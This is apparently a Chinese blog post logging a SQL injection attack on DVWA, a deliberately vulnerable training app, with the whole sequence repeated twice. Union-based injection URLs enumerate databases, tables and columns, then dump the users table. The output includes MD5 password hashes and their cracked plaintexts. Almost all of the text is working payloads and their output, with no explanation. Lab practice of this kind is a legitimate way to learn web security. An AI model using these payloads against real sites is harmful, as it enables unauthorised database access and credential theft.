标签:hello
1‘ and ‘1‘=‘1
order by 2
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20database(),user()--+&Submit=Submit#
database():dvwa version():5.0.51a-3ubuntu5
user():root @@datadir:/var/lib/mysql/
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,schema_name%20from%20information_schema.schemata%20limit%207,8%20%23%20&Submit=Submit#
information_schema,mysql,dvwa,metasploit,owasp10,tikiwiki,tikiwiki195
dvwa:0x64767761
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,7%20%23%20&Submit=Submit#
guestbook,users
users:0x7573657273
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1‘ and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x64767761 and table_name=0x7573657273 limit 0,7%23&Submit=Submit#
user_id,first_name,last_name,user,password,avatar
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1‘ and 1=2 union select user,password from dvwa.users limit 0,7%23&Submit=Submit#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03 ==abc123
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ==charley
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ==letmein
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
1‘ and ‘1‘=‘1
order by 2
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20database(),user()--+&Submit=Submit#
database():dvwa version():5.0.51a-3ubuntu5
user():root @@datadir:/var/lib/mysql/
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,schema_name%20from%20information_schema.schemata%20limit%207,8%20%23%20&Submit=Submit#
information_schema,mysql,dvwa,metasploit,owasp10,tikiwiki,tikiwiki195
dvwa:0x64767761
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,7%20%23%20&Submit=Submit#
guestbook,users
users:0x7573657273
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1‘ and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x64767761 and table_name=0x7573657273 limit 0,7%23&Submit=Submit#
user_id,first_name,last_name,user,password,avatar
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1‘ and 1=2 union select user,password from dvwa.users limit 0,7%23&Submit=Submit#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03 ==abc123
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ==charley
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ==letmein
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
password (admin)
password (smithy)
abc123 (gordonb)
letmein (pablo)
charley (1337)
本文出自 “Sniper” 博客,请务必保留此出处http://joka86.blog.51cto.com/7385844/1963743
标签:hello
原文地址:http://joka86.blog.51cto.com/7385844/1963743